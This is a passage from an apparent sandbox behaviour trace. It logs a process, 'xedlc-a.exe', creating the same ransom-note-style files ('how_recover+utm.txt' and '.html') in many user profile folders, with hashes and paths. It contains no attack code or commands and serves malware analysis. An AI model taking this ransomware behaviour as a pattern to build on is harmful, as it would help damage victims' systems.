49423.          ntstatus: 0x0
49424.          CreateOptions: 0x0
49425.        file:
49426.          timestamp: 71304
49427.          mode: created
49428.          sequenceNumber: 932
49429.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\Quick Launch\how_recover+utm.html
49430.          processinfo:
49431.            pid: 1056
49432.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49433.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49434.            ads:
49435.          fid (ads:): 281474976778282
49436.          ntstatus: 0x0
49437.          CreateOptions: 0x60
49438.        file:
49439.          timestamp: 71310
49440.          mode: close
49441.          sequenceNumber: 933
49442.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\Quick Launch\how_recover+utm.html
49443.          filesize: 9495
49444.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49445.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49446.          processinfo:
49447.            pid: 1056
49448.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49449.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49450.            ads:
49451.          fid (ads:): 281474976778282
49452.          ntstatus: 0x0
49453.          CreateOptions: 0x0
49454.        file:
49455.          timestamp: 71318
49456.          mode: created
49457.          sequenceNumber: 934
49458.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\how_recover+utm.txt
49459.          processinfo:
49460.            pid: 1056
49461.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49462.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49463.            ads:
49464.          fid (ads:): 281474976778283
49465.          ntstatus: 0x0
49466.          CreateOptions: 0x60
49467.        file:
49468.          timestamp: 71324
49469.          mode: close
49470.          sequenceNumber: 935
49471.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\how_recover+utm.txt
49472.          filesize: 2682
49473.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49474.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49475.          processinfo:
49476.            pid: 1056
49477.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49478.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49479.            ads:
49480.          fid (ads:): 281474976778283
49481.          ntstatus: 0x0
49482.          CreateOptions: 0x0
49483.        file:
49484.          timestamp: 71330
49485.          mode: created
49486.          sequenceNumber: 936
49487.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\how_recover+utm.html
49488.          processinfo:
49489.            pid: 1056
49490.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49491.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49492.            ads:
49493.          fid (ads:): 281474976778284
49494.          ntstatus: 0x0
49495.          CreateOptions: 0x60
49496.        file:
49497.          timestamp: 71336
49498.          mode: close
49499.          sequenceNumber: 937
49500.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\how_recover+utm.html
49501.          filesize: 9495
49502.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49503.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49504.          processinfo:
49505.            pid: 1056
49506.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49507.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49508.            ads:
49509.          fid (ads:): 281474976778284
49510.          ntstatus: 0x0
49511.          CreateOptions: 0x0
49512.        file:
49513.          timestamp: 71363
49514.          mode: created
49515.          sequenceNumber: 938
49516.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Media Player\how_recover+utm.txt
49517.          processinfo:
49518.            pid: 1056
49519.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49520.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49521.            ads:
49522.          fid (ads:): 281474976778285
49523.          ntstatus: 0x0
49524.          CreateOptions: 0x60
49525.        file:
49526.          timestamp: 71369
49527.          mode: close
49528.          sequenceNumber: 939
49529.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Media Player\how_recover+utm.txt
49530.          filesize: 2682
49531.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49532.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49533.          processinfo:
49534.            pid: 1056
49535.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49536.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49537.            ads:
49538.          fid (ads:): 281474976778285
49539.          ntstatus: 0x0
49540.          CreateOptions: 0x0
49541.        file:
49542.          timestamp: 71375
49543.          mode: created
49544.          sequenceNumber: 940
49545.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Media Player\how_recover+utm.html
49546.          processinfo:
49547.            pid: 1056
49548.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49549.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49550.            ads:
49551.          fid (ads:): 281474976778286
49552.          ntstatus: 0x0
49553.          CreateOptions: 0x60
49554.        file:
49555.          timestamp: 71381
49556.          mode: close
49557.          sequenceNumber: 941
49558.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Media Player\how_recover+utm.html
49559.          filesize: 9495
49560.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49561.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49562.          processinfo:
49563.            pid: 1056
49564.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49565.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49566.            ads:
49567.          fid (ads:): 281474976778286
49568.          ntstatus: 0x0
49569.          CreateOptions: 0x0
49570.        file:
49571.          timestamp: 71395
49572.          mode: created
49573.          sequenceNumber: 942
49574.          value: C:\Documents and Settings\admin\Application Data\Microsoft\MMC\how_recover+utm.txt
49575.          processinfo:
49576.            pid: 1056
49577.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49578.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49579.            ads:
49580.          fid (ads:): 281474976778287
49581.          ntstatus: 0x0
49582.          CreateOptions: 0x60
49583.        file:
49584.          timestamp: 71400
49585.          mode: close
49586.          sequenceNumber: 943
49587.          value: C:\Documents and Settings\admin\Application Data\Microsoft\MMC\how_recover+utm.txt
49588.          filesize: 2682
49589.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49590.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49591.          processinfo:
49592.            pid: 1056
49593.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49595.            ads:
49596.          fid (ads:): 281474976778287
49597.          ntstatus: 0x0
49598.          CreateOptions: 0x0
49599.        file:
49600.          timestamp: 71407
49601.          mode: created
49602.          sequenceNumber: 944
49603.          value: C:\Documents and Settings\admin\Application Data\Microsoft\MMC\how_recover+utm.html
49604.          processinfo:
49605.            pid: 1056
49606.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49607.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49608.            ads:
49609.          fid (ads:): 281474976778288
49610.          ntstatus: 0x0
49611.          CreateOptions: 0x60
49612.        file:
49613.          timestamp: 71413
49614.          mode: close
49615.          sequenceNumber: 945
49616.          value: C:\Documents and Settings\admin\Application Data\Microsoft\MMC\how_recover+utm.html
49617.          filesize: 9495
49618.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49619.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49620.          processinfo:
49621.            pid: 1056
49622.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49623.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49624.            ads:
49625.          fid (ads:): 281474976778288
49626.          ntstatus: 0x0
49627.          CreateOptions: 0x0
49628.        file:
49629.          timestamp: 71421
49630.          mode: created
49631.          sequenceNumber: 946
49632.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\how_recover+utm.txt
49633.          processinfo:
49634.            pid: 1056
49635.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49636.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49637.            ads:
49638.          fid (ads:): 281474976778289
49639.          ntstatus: 0x0
49640.          CreateOptions: 0x60
49641.        file:
49642.          timestamp: 71427
49643.          mode: close
49644.          sequenceNumber: 947
49645.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\how_recover+utm.txt
49646.          filesize: 2682
49647.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49648.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49649.          processinfo:
49650.            pid: 1056
49651.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49652.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49653.            ads:
49654.          fid (ads:): 281474976778289
49655.          ntstatus: 0x0
49656.          CreateOptions: 0x0
49657.        file:
49658.          timestamp: 71433
49659.          mode: created
49660.          sequenceNumber: 948
49661.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\how_recover+utm.html
49662.          processinfo:
49663.            pid: 1056
49664.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49665.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49666.            ads:
49667.          fid (ads:): 281474976778290
49668.          ntstatus: 0x0
49669.          CreateOptions: 0x60
49670.        file:
49671.          timestamp: 71440
49672.          mode: close
49673.          sequenceNumber: 949
49674.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\how_recover+utm.html
49675.          filesize: 9495
49676.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49677.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49678.          processinfo:
49679.            pid: 1056
49680.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49681.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49682.            ads:
49683.          fid (ads:): 281474976778290
49684.          ntstatus: 0x0
49685.          CreateOptions: 0x0
49686.        file:
49687.          timestamp: 71448
49688.          mode: created
49689.          sequenceNumber: 950
49690.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\how_recover+utm.txt
49691.          processinfo:
49692.            pid: 1056
49693.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49694.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49695.            ads:
49696.          fid (ads:): 281474976778291
49697.          ntstatus: 0x0
49698.          CreateOptions: 0x60
49699.        file:
49700.          timestamp: 71454
49701.          mode: close
49702.          sequenceNumber: 951
49703.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\how_recover+utm.txt
49704.          filesize: 2682
49705.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49706.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49707.          processinfo:
49708.            pid: 1056
49709.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49710.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49711.            ads:
49712.          fid (ads:): 281474976778291
49713.          ntstatus: 0x0
49714.          CreateOptions: 0x0
49715.        file:
49716.          timestamp: 71461
49717.          mode: created
49718.          sequenceNumber: 952
49719.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\how_recover+utm.html
49720.          processinfo:
49721.            pid: 1056
49722.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49723.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49724.            ads:
49725.          fid (ads:): 281474976778292
49726.          ntstatus: 0x0
49727.          CreateOptions: 0x60
49728.        file:
49729.          timestamp: 71466
49730.          mode: close
49731.          sequenceNumber: 953
49732.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\how_recover+utm.html
49733.          filesize: 9495
49734.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49735.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49736.          processinfo:
49737.            pid: 1056
49738.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49739.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49740.            ads:
49741.          fid (ads:): 281474976778292
49742.          ntstatus: 0x0
49743.          CreateOptions: 0x0
49744.        file:
49745.          timestamp: 71487
49746.          mode: created
49747.          sequenceNumber: 954
49748.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\how_recover+utm.txt
49749.          processinfo:
49750.            pid: 1056
49751.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49752.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49753.            ads:
49754.          fid (ads:): 281474976778293
49755.          ntstatus: 0x0
49756.          CreateOptions: 0x60
49757.        file:
49758.          timestamp: 71492
49759.          mode: close
49760.          sequenceNumber: 955
49761.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\how_recover+utm.txt
49762.          filesize: 2682
49763.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49764.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49765.          processinfo:
49766.            pid: 1056
49767.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49768.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49769.            ads:
49770.          fid (ads:): 281474976778293
49771.          ntstatus: 0x0
49772.          CreateOptions: 0x0
49773.        file:
49774.          timestamp: 71499
49775.          mode: created
49776.          sequenceNumber: 956
49777.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\how_recover+utm.html
49778.          processinfo:
49779.            pid: 1056
49780.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49781.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49782.            ads:
49783.          fid (ads:): 281474976778294
49784.          ntstatus: 0x0
49785.          CreateOptions: 0x60
49786.        file:
49787.          timestamp: 71505
49788.          mode: close
49789.          sequenceNumber: 957
49790.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\how_recover+utm.html
49791.          filesize: 9495
49792.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49793.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49794.          processinfo:
49795.            pid: 1056
49796.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49797.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49798.            ads:
49799.          fid (ads:): 281474976778294
49800.          ntstatus: 0x0
49801.          CreateOptions: 0x0
49802.        file:
49803.          timestamp: 71512
49804.          mode: created
49805.          sequenceNumber: 958
49806.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Proof\how_recover+utm.txt
49807.          processinfo:
49808.            pid: 1056
49809.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49810.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49811.            ads:
49812.          fid (ads:): 281474976778295
49813.          ntstatus: 0x0
49814.          CreateOptions: 0x60
49815.        file:
49816.          timestamp: 71518
49817.          mode: close
49818.          sequenceNumber: 959
49819.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Proof\how_recover+utm.txt
49820.          filesize: 2682
49821.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49822.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49823.          processinfo:
49824.            pid: 1056
49825.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49826.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49827.            ads:
49828.          fid (ads:): 281474976778295
49829.          ntstatus: 0x0
49830.          CreateOptions: 0x0
49831.        file:
49832.          timestamp: 71524
49833.          mode: created
49834.          sequenceNumber: 960
49835.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Proof\how_recover+utm.html
49836.          processinfo:
49837.            pid: 1056
49838.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49839.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49840.            ads:
49841.          fid (ads:): 281474976778296
49842.          ntstatus: 0x0
49843.          CreateOptions: 0x60
49844.        file:
49845.          timestamp: 71530
49846.          mode: close
49847.          sequenceNumber: 961
49848.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Proof\how_recover+utm.html
49849.          filesize: 9495
49850.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49851.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49852.          processinfo:
49853.            pid: 1056
49854.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49855.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49856.            ads:
49857.          fid (ads:): 281474976778296
49858.          ntstatus: 0x0
49859.          CreateOptions: 0x0
49860.        file:
49861.          timestamp: 71567
49862.          mode: created
49863.          sequenceNumber: 962
49864.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
49865.          processinfo:
49866.            pid: 1056
49867.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49868.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49869.            ads:
49870.          fid (ads:): 281474976778297
49871.          ntstatus: 0x0
49872.          CreateOptions: 0x60
49873.        file:
49874.          timestamp: 71573
49875.          mode: close
49876.          sequenceNumber: 963
49877.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
49878.          filesize: 2682
49879.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49880.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49881.          processinfo:
49882.            pid: 1056
49883.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49884.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49885.            ads:
49886.          fid (ads:): 281474976778297
49887.          ntstatus: 0x0
49888.          CreateOptions: 0x0
49889.        file:
49890.          timestamp: 71580
49891.          mode: created
49892.          sequenceNumber: 964
49893.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
49894.          processinfo:
49895.            pid: 1056
49896.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49897.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49898.            ads:
49899.          fid (ads:): 281474976778298
49900.          ntstatus: 0x0
49901.          CreateOptions: 0x60
49902.        file:
49903.          timestamp: 71587
49904.          mode: close
49905.          sequenceNumber: 965
49906.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
49907.          filesize: 9495
49908.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49909.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49910.          processinfo:
49911.            pid: 1056
49912.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49913.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49914.            ads:
49915.          fid (ads:): 281474976778298
49916.          ntstatus: 0x0
49917.          CreateOptions: 0x0
49918.        file:
49919.          timestamp: 71594
49920.          mode: created
49921.          sequenceNumber: 966
49922.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\how_recover+utm.txt
49923.          processinfo:
49924.            pid: 1056
49925.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49926.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49927.            ads:
49928.          fid (ads:): 281474976778299
49929.          ntstatus: 0x0
49930.          CreateOptions: 0x60
49931.        file:
49932.          timestamp: 71599
49933.          mode: close
49934.          sequenceNumber: 967
49935.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\how_recover+utm.txt
49936.          filesize: 2682
49937.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49938.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49939.          processinfo:
49940.            pid: 1056
49941.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49942.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49943.            ads:
49944.          fid (ads:): 281474976778299
49945.          ntstatus: 0x0
49946.          CreateOptions: 0x0
49947.        file:
49948.          timestamp: 71616
49949.          mode: created
49950.          sequenceNumber: 968
49951.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\how_recover+utm.html
49952.          processinfo:
49953.            pid: 1056
49954.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49955.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49956.            ads:
49957.          fid (ads:): 281474976778300
49958.          ntstatus: 0x0
49959.          CreateOptions: 0x60
49960.        file:
49961.          timestamp: 71621
49962.          mode: close
49963.          sequenceNumber: 969
49964.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\how_recover+utm.html
49965.          filesize: 9495
49966.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49967.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49968.          processinfo:
49969.            pid: 1056
49970.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49971.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49972.            ads:
49973.          fid (ads:): 281474976778300
49974.          ntstatus: 0x0
49975.          CreateOptions: 0x0
49976.        file:
49977.          timestamp: 71630
49978.          mode: created
49979.          sequenceNumber: 970
49980.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\Certificates\how_recover+utm.txt
49981.          processinfo:
49982.            pid: 1056
49983.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49984.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49985.            ads:
49986.          fid (ads:): 281474976778301
49987.          ntstatus: 0x0
49988.          CreateOptions: 0x60
49989.        file:
49990.          timestamp: 71636
49991.          mode: close
49992.          sequenceNumber: 971
49993.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\Certificates\how_recover+utm.txt
49994.          filesize: 2682
49995.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49996.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49997.          processinfo:
49998.            pid: 1056
49999.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50000.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50001.            ads:
50002.          fid (ads:): 281474976778301
50003.          ntstatus: 0x0
50004.          CreateOptions: 0x0
50005.        file:
50006.          timestamp: 71643
50007.          mode: created
50008.          sequenceNumber: 972
50009.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\Certificates\how_recover+utm.html
50010.          processinfo:
50011.            pid: 1056
50012.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50013.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50014.            ads:
50015.          fid (ads:): 281474976778302
50016.          ntstatus: 0x0
50017.          CreateOptions: 0x60
50018.        file:
50019.          timestamp: 71649
50020.          mode: close
50021.          sequenceNumber: 973
50022.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\Certificates\how_recover+utm.html
50023.          filesize: 9495
50024.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50025.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50026.          processinfo:
50027.            pid: 1056
50028.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50029.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50030.            ads:
50031.          fid (ads:): 281474976778302
50032.          ntstatus: 0x0
50033.          CreateOptions: 0x0
50034.        file:
50035.          timestamp: 71658
50036.          mode: created
50037.          sequenceNumber: 974
50038.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CRLs\how_recover+utm.txt
50039.          processinfo:
50040.            pid: 1056
50041.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50042.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50043.            ads:
50044.          fid (ads:): 281474976778303
50045.          ntstatus: 0x0
50046.          CreateOptions: 0x60
50047.        file:
50048.          timestamp: 71665
50049.          mode: close
50050.          sequenceNumber: 975
50051.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CRLs\how_recover+utm.txt
50052.          filesize: 2682
50053.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50054.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50055.          processinfo:
50056.            pid: 1056
50057.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50058.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50059.            ads:
50060.          fid (ads:): 281474976778303
50061.          ntstatus: 0x0
50062.          CreateOptions: 0x0
50063.        file:
50064.          timestamp: 71673
50065.          mode: created
50066.          sequenceNumber: 976
50067.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CRLs\how_recover+utm.html
50068.          processinfo:
50069.            pid: 1056
50070.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50071.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50072.            ads:
50073.          fid (ads:): 281474976778304
50074.          ntstatus: 0x0
50075.          CreateOptions: 0x60
50076.        file:
50077.          timestamp: 71680
50078.          mode: close
50079.          sequenceNumber: 977
50080.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CRLs\how_recover+utm.html
50081.          filesize: 9495
50082.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50083.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50084.          processinfo:
50085.            pid: 1056
50086.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50087.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50088.            ads:
50089.          fid (ads:): 281474976778304
50090.          ntstatus: 0x0
50091.          CreateOptions: 0x0
50092.        file:
50093.          timestamp: 71690
50094.          mode: created
50095.          sequenceNumber: 978
50096.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CTLs\how_recover+utm.txt
50097.          processinfo:
50098.            pid: 1056
50099.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50100.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50101.            ads:
50102.          fid (ads:): 281474976778305
50103.          ntstatus: 0x0
50104.          CreateOptions: 0x60
50105.        file:
50106.          timestamp: 71696
50107.          mode: close
50108.          sequenceNumber: 979
50109.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CTLs\how_recover+utm.txt
50110.          filesize: 2682
50111.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50112.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50113.          processinfo:
50114.            pid: 1056
50115.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50116.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50117.            ads:
50118.          fid (ads:): 281474976778305
50119.          ntstatus: 0x0
50120.          CreateOptions: 0x0
50121.        file:
50122.          timestamp: 71702
50123.          mode: created
50124.          sequenceNumber: 980
50125.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CTLs\how_recover+utm.html
50126.          processinfo:
50127.            pid: 1056
50128.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50129.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50130.            ads:
50131.          fid (ads:): 281474976778306
50132.          ntstatus: 0x0
50133.          CreateOptions: 0x60
50134.        file:
50135.          timestamp: 71708
50136.          mode: close
50137.          sequenceNumber: 981
50138.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CTLs\how_recover+utm.html
50139.          filesize: 9495
50140.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50141.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50142.          processinfo:
50143.            pid: 1056
50144.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50145.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50146.            ads:
50147.          fid (ads:): 281474976778306
50148.          ntstatus: 0x0
50149.          CreateOptions: 0x0
50150.        file:
50151.          timestamp: 71716
50152.          mode: created
50153.          sequenceNumber: 982
50154.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\how_recover+utm.txt
50155.          processinfo:
50156.            pid: 1056
50157.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50158.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50159.            ads:
50160.          fid (ads:): 281474976778307
50161.          ntstatus: 0x0
50162.          CreateOptions: 0x60
50163.        file:
50164.          timestamp: 71724
50165.          mode: close
50166.          sequenceNumber: 983
50167.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\how_recover+utm.txt
50168.          filesize: 2682
50169.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50170.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50171.          processinfo:
50172.            pid: 1056
50173.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50174.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50175.            ads:
50176.          fid (ads:): 281474976778307
50177.          ntstatus: 0x0
50178.          CreateOptions: 0x0
50179.        file:
50180.          timestamp: 71754
50181.          mode: created
50182.          sequenceNumber: 984
